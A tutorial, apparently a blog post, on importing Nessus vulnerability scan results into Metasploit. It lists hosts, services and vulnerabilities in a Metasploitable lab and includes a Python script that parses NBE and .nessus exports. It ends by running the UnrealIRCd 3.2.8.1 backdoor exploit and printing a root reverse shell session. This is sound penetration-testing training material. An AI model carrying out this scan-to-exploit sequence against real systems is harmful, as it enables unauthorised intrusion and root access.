Using Metasploit with Nessus

What is Nessus?

Nessus is a well-known and popular vulnerability scanner, free for personal, non-commercial use. It was first released in 1998 by Renaud Deraison and is now published by Tenable Network Security (https://www.tenable.com/). There is also a fork of Nessus 2 called OpenVAS, which is released under the GPL. Using the large number of vulnerability checks in Nessus (called plugins), you can identify a great many well-known vulnerabilities. Metasploit accepts vulnerability scan result files from both Nessus and OpenVAS in the nbe file format; db_import also parses the .nessus XML export, which is what current Nessus releases produce (note that the nessus_scan_export command listed below offers Nessus, HTML, PDF, CSV and DB formats, but no nbe).

 

Let's walk through the process. First we complete the scan in Nessus: [image: Nessus vulnerability scan]

 

Once the vulnerability scan has completed, we save the results in nbe format and then start msfconsole. Next we need to import the results into the Metasploit Framework. Let's load the Nessus plugin and look at the 'help' command.

msf > load nessus
[*] Nessus Bridge for Metasploit
[*] Type nessus_help for a command listing
[*] Successfully loaded plugin: Nessus
msf > help

Command                     Help Text
-------                     ---------
Generic Commands
-----------------           -----------------
nessus_connect              Connect to a Nessus server
nessus_logout               Logout from the Nessus server
nessus_login                Login into the connected Nessus server with a different username and password
nessus_save                 Save credentials of the logged in user to nessus.yml
nessus_help                 Listing of available nessus commands
nessus_server_properties    Nessus server properties such as feed type, version, plugin set and server UUID.
nessus_server_status        Check the status of your Nessus server
nessus_admin                Checks if user is an admin
nessus_template_list        List scan or policy templates
nessus_folder_list          List all configured folders on the Nessus server
nessus_scanner_list         List all the scanners configured on the Nessus server

Nessus Database Commands
-----------------           -----------------
nessus_db_scan              Create a scan of all IP addresses in db_hosts
nessus_db_scan_workspace    Create a scan of all IP addresses in db_hosts for a given workspace
nessus_db_import            Import Nessus scan to the Metasploit connected database

Reports Commands
-----------------           -----------------
nessus_report_hosts         Get list of hosts from a report
nessus_report_vulns         Get list of vulns from a report
nessus_report_host_details  Get detailed information from a report item on a host

Scan Commands
-----------------           -----------------
nessus_scan_list            List of all current Nessus scans
nessus_scan_new             Create a new Nessus scan
nessus_scan_launch          Launch a newly created scan. New scans need to be manually launched via this command
nessus_scan_pause           Pause a running Nessus scan
nessus_scan_pause_all       Pause all running Nessus scans
nessus_scan_stop            Stop a running or paused Nessus scan
nessus_scan_stop_all        Stop all running or paused Nessus scans
nessus_scan_resume          Resume a paused Nessus scan
nessus_scan_resume_all      Resume all paused Nessus scans
nessus_scan_details         Return detailed information of a given scan
nessus_scan_export          Export a scan result in either Nessus, HTML, PDF, CSV or DB format
nessus_scan_export_status   Check the export status of a scan

Plugin Commands
-----------------           -----------------
nessus_plugin_list          List all plugins in a particular plugin family.
nessus_family_list          List all the plugin families along with their corresponding family IDs and plugin count.
nessus_plugin_details       List details of a particular plugin

User Commands
-----------------           -----------------
nessus_user_list            Show Nessus users
nessus_user_add             Add a new Nessus user
nessus_user_del             Delete a Nessus user
nessus_user_passwd          Change a Nessus user's password

Policy Commands
-----------------           -----------------
nessus_policy_list          List all policies
nessus_policy_del           Delete a policy

 

Let's go ahead and import the nbe results file by issuing the db_import command followed by the path to the results file.

msf > db_import /root/Nessus/nessus_scan.nbe
[*] Importing 'Nessus NBE Report' data
[*] Importing host 172.16.194.254
[*] Importing host 172.16.194.254
[*] Importing host 172.16.194.254
[*] Importing host 172.16.194.2
[*] Importing host 172.16.194.2
[*] Importing host 172.16.194.2
...snip...
[*] Importing host 172.16.194.1
[*] Importing host 172.16.194.1
[*] Importing host 172.16.194.1
[*] Importing host 172.16.194.1
[*] Importing host 172.16.194.1
[*] Successfully imported /root/Nessus/nessus_scan.nbe
msf > 

 

After the results file has been imported, we can run the hosts command to list the hosts recorded in the nbe results file.

msf > hosts

Hosts
=====

address         mac  name    os_name                                                                             os_flavor  os_sp  purpose  info  comments
-------         ---  ----    -------                                                                             ---------  -----  -------  ----  --------
172.16.194.1                 one of these operating systems : \nMac OS X 10.5\nMac OS X 10.6\nMac OS X 10.7\n                      device         
172.16.194.2                 Unknown                                                                                               device         
172.16.194.134               Microsoft Windows                                                                   XP         SP2    client         
172.16.194.148               Linux Kernel 2.6 on Ubuntu 8.04 (hardy)\n                                                             device         
172.16.194.163               Linux Kernel 3.2.6 on Ubuntu 10.04\n                                                                  device         
172.16.194.165       phpcgi  Linux phpcgi 2.6.32-38-generic-pae #83-Ubuntu SMP Wed Jan 4 12:11:13 UTC 2017 i686                    device         
172.16.194.172               Linux Kernel 2.6 on Ubuntu 8.04 (hardy)\n                                                             device                                                                                                                                          

msf >

 

We see exactly what we expected. Next we run the services command, which enumerates all the services detected on the scanned system (here filtered to one host).

msf > services 172.16.194.172

Services
========

host            port   proto  name            state  info
----            ----   -----  ----            -----  ----
172.16.194.172  21     tcp    ftp             open   
172.16.194.172  22     tcp    ssh             open   
172.16.194.172  23     tcp    telnet          open   
172.16.194.172  25     tcp    smtp            open   
172.16.194.172  53     udp    dns             open   
172.16.194.172  53     tcp    dns             open   
172.16.194.172  69     udp    tftp            open   
172.16.194.172  80     tcp    www             open   
172.16.194.172  111    tcp    rpc-portmapper  open   
172.16.194.172  111    udp    rpc-portmapper  open   
172.16.194.172  137    udp    netbios-ns      open   
172.16.194.172  139    tcp    smb             open   
172.16.194.172  445    tcp    cifs            open   
172.16.194.172  512    tcp    rexecd          open   
172.16.194.172  513    tcp    rlogin          open   
172.16.194.172  514    tcp    rsh             open   
172.16.194.172  1099   tcp    rmi_registry    open   
172.16.194.172  1524   tcp                    open   
172.16.194.172  2049   tcp    rpc-nfs         open   
172.16.194.172  2049   udp    rpc-nfs         open   
172.16.194.172  2121   tcp    ftp             open   
172.16.194.172  3306   tcp    mysql           open   
172.16.194.172  5432   tcp    postgresql      open   
172.16.194.172  5900   tcp    vnc             open   
172.16.194.172  6000   tcp    x11             open   
172.16.194.172  6667   tcp    irc             open   
172.16.194.172  8009   tcp    ajp13           open   
172.16.194.172  8787   tcp                    open   
172.16.194.172  45303  udp    rpc-status      open   
172.16.194.172  45765  tcp    rpc-mountd      open   
172.16.194.172  47161  tcp    rpc-nlockmgr    open   
172.16.194.172  50410  tcp    rpc-status      open   
172.16.194.172  52843  udp    rpc-nlockmgr    open   
172.16.194.172  55269  udp    rpc-mountd      open 

 

Finally, and most importantly, the vulns command lists all the vulnerabilities that Nessus reported and that were recorded in the results file. Issuing help vulns shows the command's many options. We will filter the search by port number to keep the command's output manageable.

msf > help vulns
Print all vulnerabilities in the database

Usage: vulns [addr range]

  -h,--help             Show this help information
  -p,--port <portspec>  List vulns matching this port spec
  -s <svc names>        List vulns matching these service names
  -S,--search           Search string to filter by
  -i,--info             Display Vuln Info

Examples:
  vulns -p 1-65536          # only vulns with associated services
  vulns -p 1-65536 -s http  # identified as http on any port

msf >

 

msf > vulns -p 139
[*] Time: 2012-06-15 18:32:26 UTC Vuln: host=172.16.194.134 name=NSS-11011 refs=NSS-11011 
[*] Time: 2012-06-15 18:32:23 UTC Vuln: host=172.16.194.172 name=NSS-11011 refs=NSS-11011 

msf > vulns -p 22
[*] Time: 2017-06-15 18:32:25 UTC Vuln: host=172.16.194.148 name=NSS-10267 refs=NSS-10267 
[*] Time: 2017-06-15 18:32:25 UTC Vuln: host=172.16.194.148 name=NSS-22964 refs=NSS-22964 
[*] Time: 2017-06-15 18:32:25 UTC Vuln: host=172.16.194.148 name=NSS-10881 refs=NSS-10881 
[*] Time: 2017-06-15 18:32:25 UTC Vuln: host=172.16.194.148 name=NSS-39520 refs=NSS-39520 
[*] Time: 2017-06-15 18:32:25 UTC Vuln: host=172.16.194.163 name=NSS-39520 refs=NSS-39520 
[*] Time: 2017-06-15 18:32:25 UTC Vuln: host=172.16.194.163 name=NSS-25221 refs=NSS-25221 
[*] Time: 2017-06-15 18:32:25 UTC Vuln: host=172.16.194.163 name=NSS-10881 refs=NSS-10881 
[*] Time: 2017-06-15 18:32:25 UTC Vuln: host=172.16.194.163 name=NSS-10267 refs=NSS-10267 
[*] Time: 2017-06-15 18:32:25 UTC Vuln: host=172.16.194.163 name=NSS-22964 refs=NSS-22964 
[*] Time: 2017-06-15 18:32:24 UTC Vuln: host=172.16.194.172 name=NSS-39520 refs=NSS-39520 
[*] Time: 2017-06-15 18:32:24 UTC Vuln: host=172.16.194.172 name=NSS-10881 refs=NSS-10881 
[*] Time: 2017-06-15 18:32:24 UTC Vuln: host=172.16.194.172 name=NSS-32314 refs=CVE-2008-0166,BID-29179,OSVDB-45029,CWE-310,NSS-32314 
[*] Time: 2017-06-15 18:32:24 UTC Vuln: host=172.16.194.172 name=NSS-10267 refs=NSS-10267 
[*] Time: 2017-06-15 18:32:24 UTC Vuln: host=172.16.194.172 name=NSS-22964 refs=NSS-22964 

msf > vulns 172.16.194.172 -p 6667
[*] Time: 2017-06-15 18:32:23 UTC Vuln: host=172.16.194.172 name=NSS-46882 refs=CVE-2010-2075,BID-40820,OSVDB-65445,NSS-46882 
[*] Time: 2017-06-15 18:32:23 UTC Vuln: host=172.16.194.172 name=NSS-11156 refs=NSS-11156 
[*] Time: 2017-06-15 18:32:23 UTC Vuln: host=172.16.194.172 name=NSS-17975 refs=NSS-17975 
msf >

 

Let's take the CVE that Nessus associated with port 6667 and see whether Metasploit has anything related. We issue the search command from msfconsole with the CVE number.

msf > search cve:2010-2075

Matching Modules
================

   Name                                        Disclosure Date  Rank       Description
   ----                                        ---------------  ----       -----------
   exploit/unix/irc/unreal_ircd_3281_backdoor  2010-06-12       excellent  UnrealIRCD 3.2.8.1 Backdoor Command Execution


msf >
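The hosts, services and vulns views above and the search query that follows from them are all projections of what db_import extracted from the Nessus export. The following Python script is an added example written for this article, not code from Metasploit or Tenable: it parses a small constructed NBE export and an equivalent constructed .nessus (v2 XML) fragment into one finding list, reproduces the services and vulns -p filters, and turns the CVE references seen on a port into the search cve:... commands to type into msfconsole. The NBE record layout (results|subnet|host|service (port/proto)|plugin id|severity|description, with newlines inside the description encoded as the two characters \n) and the .nessus attribute and element names are assumptions based on those formats as documented; the reference ordering (CVE, BID, other cross-references, then NSS-<plugin id>) mirrors the refs= column of the vulns output above.

```python
"""Added example for this article, not code from Metasploit or Tenable: parse a
Nessus NBE export and a .nessus v2 XML export into one finding list, then
reproduce what the services, vulns -p and search cve: steps show."""
import re
import xml.etree.ElementTree as ET
from collections import namedtuple

Finding = namedtuple("Finding", "host port proto svc plugin severity refs")
# NBE service field, e.g. "irc (6667/tcp)" or "general/tcp (0/tcp)" (assumed layout)
_NBE_SVC = re.compile(r"^(.*?)\s*\((\d+)/(tcp|udp)\)\s*$")


def _refs_from_text(plugin, text):
    """References in the order the vulns output lists them: CVE-*, BID-*,
    other cross-refs (OSVDB/CWE), then NSS-<plugin id>."""
    refs = []
    m = re.search(r"^CVE : (.+)$", text, re.M)
    for c in (m.group(1).split(",") if m else []):
        c = c.strip()
        refs.append(c if c.startswith("CVE-") else "CVE-" + c)
    m = re.search(r"^BID : (.+)$", text, re.M)
    refs += ["BID-" + b.strip() for b in (m.group(1).split(",") if m else [])]
    m = re.search(r"^Other references : (.+)$", text, re.M)  # "OSVDB:45029, CWE:310"
    refs += [x.strip().replace(":", "-", 1) for x in (m.group(1).split(",") if m else [])]
    return refs + ["NSS-" + plugin]


def parse_nbe(text):
    """Pipe-delimited; only 'results' records carry findings (assumed layout):
    results|subnet|host|service (port/proto)|plugin id|severity|description"""
    findings = []
    for line in text.splitlines():
        f = line.split("|", 6)
        if len(f) < 7 or f[0] != "results" or not _NBE_SVC.match(f[3]):
            continue
        svc, port, proto = _NBE_SVC.match(f[3]).groups()
        desc = f[6].replace("\\n", "\n")  # NBE encodes newlines as literal \n
        findings.append(Finding(f[2], int(port), proto, svc, f[4], f[5],
                                _refs_from_text(f[4], desc)))
    return findings


def _text(e):
    return (e.text or "").strip()


def parse_nessus_xml(text):
    """.nessus v2 (what current Nessus exports instead of NBE): <ReportHost name="ip">
    holds <ReportItem> elements; attributes give port/protocol/svc_name/pluginID,
    <cve>/<bid>/<xref> children give the references (assumed element names)."""
    findings = []
    for rh in ET.fromstring(text).iter("ReportHost"):
        for it in rh.iter("ReportItem"):
            refs = [_text(e) for e in it.findall("cve")]
            refs += ["BID-" + _text(e) for e in it.findall("bid")]
            refs += [_text(e).replace(":", "-", 1) for e in it.findall("xref")]
            findings.append(Finding(rh.get("name"), int(it.get("port")), it.get("protocol"),
                                    it.get("svc_name"), it.get("pluginID"), it.get("severity"),
                                    refs + ["NSS-" + it.get("pluginID")]))
    return findings


def services(findings, host):
    """Like `services <host>`: distinct (port, proto, name); port 0 (general/tcp) dropped."""
    return sorted({(f.port, f.proto, f.svc) for f in findings if f.host == host and f.port})


def vulns(findings, port=None, host=None):
    """Like `vulns [host] -p <port>`."""
    return [f for f in findings
            if (port is None or f.port == port) and (host is None or f.host == host)]


def msf_search_commands(findings, port):
    """One `search cve:YYYY-NNNN` per distinct CVE seen on the port (the manual step above)."""
    cves = {r[4:] for f in vulns(findings, port) for r in f.refs if r.startswith("CVE-")}
    return ["search cve:" + c for c in sorted(cves)]


# Constructed sample records mirroring the article's findings; not a real export.
SAMPLE_NBE = (
    "timestamps|||scan_start|Fri Jun 15 18:32:23 2012|\n"
    "results|172.16.194|172.16.194.172|irc (6667/tcp)|46882|Security Hole|Synopsis :\\n\\n"
    "The remote IRC server contains a backdoor.\\n\\nCVE : CVE-2010-2075\\nBID : 40820\\n"
    "Other references : OSVDB:65445\\n\n"
    "results|172.16.194|172.16.194.172|ssh (22/tcp)|32314|Security Hole|Synopsis :\\n\\n"
    "Weak SSH host keys.\\n\\nCVE : CVE-2008-0166\\nBID : 29179\\nOther references : OSVDB:45029, CWE:310\\n\n"
    "results|172.16.194|172.16.194.172|ssh (22/tcp)|10267|Security Note|SSH Server type and version\\n\n"
    "results|172.16.194|172.16.194.172|general/tcp (0/tcp)|19506|Security Note|Nessus Scan Information\\n\n"
    "results|172.16.194|172.16.194.134|smb (139/tcp)|11011|Security Note|SMB service detection\\n\n"
)
SAMPLE_NESSUS_XML = """<NessusClientData_v2><Report name="lab"><ReportHost name="172.16.194.172">
<ReportItem port="6667" svc_name="irc" protocol="tcp" severity="4" pluginID="46882"
 pluginName="UnrealIRCd Backdoor Detection" pluginFamily="Backdoors">
 <cve>CVE-2010-2075</cve><bid>40820</bid><xref>OSVDB:65445</xref></ReportItem>
<ReportItem port="22" svc_name="ssh" protocol="tcp" severity="0" pluginID="10267"
 pluginName="SSH Server Type and Version Information" pluginFamily="Service detection"/>
</ReportHost></Report></NessusClientData_v2>"""

if __name__ == "__main__":
    found = parse_nbe(SAMPLE_NBE) + parse_nessus_xml(SAMPLE_NESSUS_XML)
    for port, proto, svc in services(found, "172.16.194.172"):
        print(f"{port:<6}{proto:<5}{svc}")
    for v in vulns(found, port=6667):
        print(f"Vuln: host={v.host} name=NSS-{v.plugin} refs={','.join(v.refs)}")
    print("\n".join(msf_search_commands(found, 6667)))
```

Run it directly to print the three views for the constructed data; to use it on a real export, read the file and pass its text to the parser matching the format. Keep in mind that nbe is a legacy format: a current Nessus exports .nessus XML, which is also what db_import will see most often.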

 

We see that Metasploit has a working module for this vulnerability. The next step is to use the module, set the required options (at minimum RHOST pointing at 172.16.194.172, a step the transcript below does not show) and run the exploit.

msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf  exploit(unreal_ircd_3281_backdoor) > exploit

[*] Started reverse double handler
[*] Connected to 172.16.194.172:6667...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo Q4SefN7pIVSQUL2F;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "Q4SefN7pIVSQUL2F\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (172.16.194.163:4444 -> 172.16.194.172:35941) at 2017-06-15 15:08:51 -0400

ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0c:29:d1:62:80  
          inet addr:172.16.194.172  Bcast:172.16.194.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fed1:6280/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:290453 errors:0 dropped:0 overruns:0 frame:0
          TX packets:402340 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:41602322 (39.6 MB)  TX bytes:344600671 (328.6 MB)
          Interrupt:19 Base address:0x2000 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:774 errors:0 dropped:0 overruns:0 frame:0
          TX packets:774 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:343253 (335.2 KB)  TX bytes:343253 (335.2 KB)

id
uid=0(root) gid=0(root)

 

As you can see, importing Nessus scan results into Metasploit is a powerful feature. This demonstrates the versatility of the framework and some of the possibilities for integrating with third-party tools such as Nessus. Note that the shell is already root (uid=0 in the id output) because the IRC daemon on this target runs as root, so no privilege escalation was needed.

Published: 2018-05-14 22:46:28  Category: Metasploit
Last updated: 2018-05-14 23:10:02
Author: 付杰